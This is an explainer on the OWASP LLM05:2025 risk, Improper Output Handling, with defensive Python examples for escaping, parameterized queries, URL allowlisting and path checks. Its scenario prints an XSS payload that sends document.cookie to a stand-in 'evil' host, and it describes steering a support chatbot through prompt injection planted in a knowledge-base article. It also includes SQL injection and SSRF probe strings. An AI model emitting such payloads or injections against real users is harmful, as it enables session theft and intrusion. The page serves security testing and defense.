the attack surface · LLM05:2025

Improper Output Handling

OWASP Top 10 for LLM Applications · 2025

OWASP LLM05: Improper Output Handling (OWASP GenAI)

Improper Output Handling refers to insufficient validation, sanitization, and handling of LLM-generated output before it is passed downstream to other components. The result is a model that acts as an unfiltered conduit for classic appsec payloads.

How it's exploited

The model is upstream of a sink that trusts it. Whatever text the LLM emits flows, unsanitized, straight into a browser, shell, database, or HTTP client — so a crafted (or prompt-injected) response carries an executable payload into a context that interprets it:

XSS — model-authored HTML/Markdown/JavaScript rendered verbatim in a browser.
RCE — output handed to a system shell, eval(), or a code interpreter.
SQL injection — generated queries executed without parameterization.
SSRF / CSRF — attacker-controlled URLs or forged requests embedded in the reply.
Path traversal & privilege escalation — unsanitized file paths and over-broad backend permissions exercised via the output.
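The SQL injection case above can be sketched in a few lines. This is a minimal illustration, assuming a hypothetical `users` table and a hypothetical model output that an injected instruction has steered; it uses Python's standard `sqlite3` module only as a stand-in for whatever database the application really talks to.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    # Hypothetical schema and rows, created in memory for the demonstration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    # VULNERABLE: the model output is spliced into the SQL text itself,
    # so any quote characters in it change the structure of the query.
    query = f"SELECT id, name FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    # The model output is bound as a value and is never parsed as SQL.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    model_output = "nobody' OR '1'='1"  # hypothetical steered model output
    print(len(find_user_unsafe(conn, model_output)))  # 2: every row matches
    print(len(find_user_safe(conn, model_output)))    # 0: treated as a literal name
```

The same text is harmless or harmful depending only on how the sink consumes it, which is why the fix belongs in the query code rather than in the prompt.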

What it looks like

A support chatbot renders model replies as Markdown. An attacker seeds a knowledge-base article (or sends a message) that steers the model into returning <img src=x onerror=fetch('//evil/'+document.cookie)>. The frontend renders the reply without escaping it, so the payload becomes stored XSS that fires in every agent's session. The same root cause shows up at other sinks: "delete all tables" echoed into an unparameterized query, or a hallucinated package name that pulls malware into a build.
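To make the chatbot scenario concrete, here is a minimal sketch of the output-encoding step, assuming the reply only needs to be displayed as text. The function name `render_reply_as_text` and the wrapping `div` are hypothetical; `html.escape` is from the Python standard library.

```python
import html


def render_reply_as_text(model_reply: str) -> str:
    # Escape <, >, & and both quote characters so the browser displays
    # the markup as text instead of parsing it as HTML.
    return f'<div class="reply">{html.escape(model_reply, quote=True)}</div>'


if __name__ == "__main__":
    payload = "<img src=x onerror=fetch('//evil/'+document.cookie)>"
    print(render_reply_as_text(payload))
```

If the product genuinely needs rich Markdown, plain escaping is too blunt. A common alternative is to render the Markdown and then pass the resulting HTML through an allowlist-based sanitizer, but that design is outside what this sketch shows.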

How to test for it

Treat the model as an injection oracle and drive standard appsec payloads through it. Prompt it to emit <script> tags or onerror= handlers and watch whether the UI executes them. Coax SQL metacharacters or stacked queries into any database-bound output. Request URLs and file paths to probe SSRF and traversal sinks. Chain with prompt injection (LLM01) so the trigger comes from data, not the user. The bug is in the sink, so confirm the rendered or executed result, not just the model text.
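One way to start on the sink side is a small harness that feeds probe strings through the rendering function and flags any that come back verbatim. The sketch below is an assumption-laden first pass: `PROBES`, `find_unescaped`, `raw_sink`, and `escaping_sink` are all hypothetical names, the model reply is stubbed by the probe itself, and a substring match is only a heuristic. Confirming real execution still requires loading the output in a browser.

```python
import html
from typing import Callable, List

# Illustrative probes only; a real assessment would use a fuller corpus.
PROBES: List[str] = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
]


def find_unescaped(render: Callable[[str], str], probes: List[str] = PROBES) -> List[str]:
    """Return the probes that appear verbatim in the sink's rendered output."""
    return [probe for probe in probes if probe in render(probe)]


def raw_sink(text: str) -> str:
    # Hypothetical vulnerable sink: inserts the reply into HTML unchanged.
    return f"<div>{text}</div>"


def escaping_sink(text: str) -> str:
    # Hypothetical hardened sink: HTML-encodes the reply first.
    return f"<div>{html.escape(text)}</div>"


if __name__ == "__main__":
    print(find_unescaped(raw_sink))       # both probes survive
    print(find_unescaped(escaping_sink))  # empty list
```

In practice the `render` argument would wrap the application's real rendering path, and the probes would arrive via the model (ideally through injected data) rather than being passed in directly.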

Defenses

Adopt a zero-trust posture toward model output: validate and sanitize it exactly as you would untrusted user input.

Context-aware output encoding at every sink — HTML, JS, SQL, URL, shell.
Parameterized queries / prepared statements for all DB access.
Content Security Policy to blunt XSS; follow OWASP ASVS input-handling guidance.
Least privilege on backends the model can reach, plus logging and anomaly detection on output-driven actions.
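For the URL and file-path sinks, validating model output "as untrusted user input" might look like the sketch below. The allowlisted host `api.example.com`, the base directory `/srv/app/files`, and both function names are hypothetical. The URL check does not cover redirects or DNS rebinding, so treat it as one layer alongside least privilege, not a complete SSRF defense.

```python
from pathlib import Path
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.example.com"}  # hypothetical allowlist of outbound hosts
BASE_DIR = Path("/srv/app/files")    # hypothetical directory the model may read


def is_allowed_url(url: str) -> bool:
    """Accept only https URLs whose host is explicitly allowlisted."""
    try:
        parts = urlsplit(url)
    except ValueError:
        # Malformed URLs (for example an unclosed IPv6 bracket) are rejected.
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


def resolve_inside_base(model_path: str, base: Path = BASE_DIR) -> Path:
    """Resolve a model-supplied path and refuse anything outside `base`."""
    base = base.resolve()
    candidate = (base / model_path).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError(f"path escapes base directory: {model_path!r}")
    return candidate


if __name__ == "__main__":
    print(is_allowed_url("https://api.example.com/v1/items"))           # True
    print(is_allowed_url("https://169.254.169.254/latest/meta-data/"))  # False
    print(resolve_inside_base("reports/q1.txt"))
    try:
        resolve_inside_base("../../etc/passwd")
    except ValueError as exc:
        print("rejected:", exc)
```

Both checks are allowlists rather than blocklists: they state what the sink may receive and reject everything else, which tends to hold up better against payload variations the developer did not anticipate.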